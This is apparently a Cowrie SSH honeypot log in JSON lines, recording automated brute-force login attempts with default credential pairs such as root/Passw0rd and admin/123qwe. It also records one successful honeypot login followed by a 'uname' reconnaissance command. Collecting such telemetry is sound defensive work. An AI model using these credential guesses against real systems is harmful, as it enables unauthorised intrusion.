{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:36:40.759250Z","src_ip":"212.227.125.160","session":"7a8d17306867"}
{"eventid":"cowrie.login.failed","username":"data","password":"data","message":"login attempt [data/data] failed","sensor":"my-vps","timestamp":"2025-08-26T21:36:41.530140Z","src_ip":"212.227.125.160","session":"7a8d17306867"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:42.582248Z","src_ip":"212.227.125.160","session":"7a8d17306867"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34492,"dst_ip":"1.2.3.4","dst_port":22,"session":"e521e7c03642","protocol":"ssh","message":"New connection: 212.227.125.160:34492 (1.2.3.4:22) [session: e521e7c03642]","sensor":"my-vps","timestamp":"2025-08-26T21:36:46.285612Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:46.286631Z","src_ip":"212.227.125.160","session":"e521e7c03642"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:36:46.338126Z","src_ip":"212.227.125.160","session":"e521e7c03642"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest123","message":"login attempt [guest/guest123] failed","sensor":"my-vps","timestamp":"2025-08-26T21:36:46.512168Z","src_ip":"212.227.125.160","session":"e521e7c03642"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:47.566343Z","src_ip":"212.227.125.160","session":"e521e7c03642"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58114,"dst_ip":"1.2.3.4","dst_port":22,"session":"274801cd9063","protocol":"ssh","message":"New connection: 212.227.125.160:58114 (1.2.3.4:22) [session: 274801cd9063]","sensor":"my-vps","timestamp":"2025-08-26T21:36:51.836349Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:51.837408Z","src_ip":"212.227.125.160","session":"274801cd9063"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:36:51.894930Z","src_ip":"212.227.125.160","session":"274801cd9063"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-26T21:36:52.173367Z","src_ip":"212.227.125.160","session":"274801cd9063"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:53.397773Z","src_ip":"212.227.125.160","session":"274801cd9063"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34204,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c5dd89706d0","protocol":"ssh","message":"New connection: 212.227.235.229:34204 (1.2.3.4:22) [session: 5c5dd89706d0]","sensor":"my-vps","timestamp":"2025-08-26T21:36:55.499829Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:56.992849Z","src_ip":"212.227.235.229","session":"5c5dd89706d0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:36:56.993672Z","src_ip":"212.227.235.229","session":"5c5dd89706d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53504,"dst_ip":"1.2.3.4","dst_port":22,"session":"85f79fed78ed","protocol":"ssh","message":"New connection: 212.227.125.160:53504 (1.2.3.4:22) [session: 85f79fed78ed]","sensor":"my-vps","timestamp":"2025-08-26T21:36:57.300473Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:36:57.301557Z","src_ip":"212.227.125.160","session":"85f79fed78ed"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:36:57.345085Z","src_ip":"212.227.125.160","session":"85f79fed78ed"}
{"eventid":"cowrie.login.failed","username":"proxy","password":"proxy","message":"login attempt [proxy/proxy] failed","sensor":"my-vps","timestamp":"2025-08-26T21:36:57.518108Z","src_ip":"212.227.125.160","session":"85f79fed78ed"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:36:58.563485Z","src_ip":"212.227.125.160","session":"85f79fed78ed"}
{"eventid":"cowrie.login.failed","username":"admin","password":"123qwe","message":"login attempt [admin/123qwe] failed","sensor":"my-vps","timestamp":"2025-08-26T21:37:02.616666Z","src_ip":"212.227.235.229","session":"5c5dd89706d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48890,"dst_ip":"1.2.3.4","dst_port":22,"session":"e453f8f2f76e","protocol":"ssh","message":"New connection: 212.227.125.160:48890 (1.2.3.4:22) [session: e453f8f2f76e]","sensor":"my-vps","timestamp":"2025-08-26T21:37:02.905995Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:37:02.906893Z","src_ip":"212.227.125.160","session":"e453f8f2f76e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:37:02.959254Z","src_ip":"212.227.125.160","session":"e453f8f2f76e"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam","message":"login attempt [steam/steam] failed","sensor":"my-vps","timestamp":"2025-08-26T21:37:03.180161Z","src_ip":"212.227.125.160","session":"e453f8f2f76e"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:04.242884Z","src_ip":"212.227.125.160","session":"e453f8f2f76e"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:05.003894Z","src_ip":"212.227.235.229","session":"5c5dd89706d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44276,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9f66100df71","protocol":"ssh","message":"New connection: 212.227.125.160:44276 (1.2.3.4:22) [session: c9f66100df71]","sensor":"my-vps","timestamp":"2025-08-26T21:37:07.938001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:37:07.971361Z","src_ip":"212.227.125.160","session":"c9f66100df71"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:37:08.012855Z","src_ip":"212.227.125.160","session":"c9f66100df71"}
{"eventid":"cowrie.login.failed","username":"student","password":"student","message":"login attempt [student/student] failed","sensor":"my-vps","timestamp":"2025-08-26T21:37:08.275200Z","src_ip":"212.227.125.160","session":"c9f66100df71"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:09.321784Z","src_ip":"212.227.125.160","session":"c9f66100df71"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39666,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c5335a8393e","protocol":"ssh","message":"New connection: 212.227.125.160:39666 (1.2.3.4:22) [session: 3c5335a8393e]","sensor":"my-vps","timestamp":"2025-08-26T21:37:13.640780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:37:13.644930Z","src_ip":"212.227.125.160","session":"3c5335a8393e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:37:13.702072Z","src_ip":"212.227.125.160","session":"3c5335a8393e"}
{"eventid":"cowrie.login.failed","username":"angel","password":"angel","message":"login attempt [angel/angel] failed","sensor":"my-vps","timestamp":"2025-08-26T21:37:13.962277Z","src_ip":"212.227.125.160","session":"3c5335a8393e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:15.032148Z","src_ip":"212.227.125.160","session":"3c5335a8393e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35052,"dst_ip":"1.2.3.4","dst_port":22,"session":"30b685bbb34c","protocol":"ssh","message":"New connection: 212.227.125.160:35052 (1.2.3.4:22) [session: 30b685bbb34c]","sensor":"my-vps","timestamp":"2025-08-26T21:37:19.229803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:37:19.237430Z","src_ip":"212.227.125.160","session":"30b685bbb34c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:37:19.274988Z","src_ip":"212.227.125.160","session":"30b685bbb34c"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:37:19.458919Z","src_ip":"212.227.125.160","session":"30b685bbb34c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:37:19.626637Z","src_ip":"212.227.125.160","session":"30b685bbb34c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T21:37:19.627358Z","src_ip":"212.227.125.160","session":"30b685bbb34c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:19.675429Z","src_ip":"212.227.125.160","session":"30b685bbb34c"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:37:19.676780Z","src_ip":"212.227.125.160","session":"30b685bbb34c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58670,"dst_ip":"1.2.3.4","dst_port":22,"session":"51b0ad45d433","protocol":"ssh","message":"New connection: 212.227.125.160:58670 (1.2.3.4:22) [session: 51b0ad45d433]","sensor":"my-vps","timestamp":"2025-08-26T21:37:24.971954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:37:24.984716Z","src_ip":"212.227.125.160","session":"51b0ad45d433"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T21:37:25.016881Z","src_ip":"212.227.125.160","session":"51b0ad45d433"}
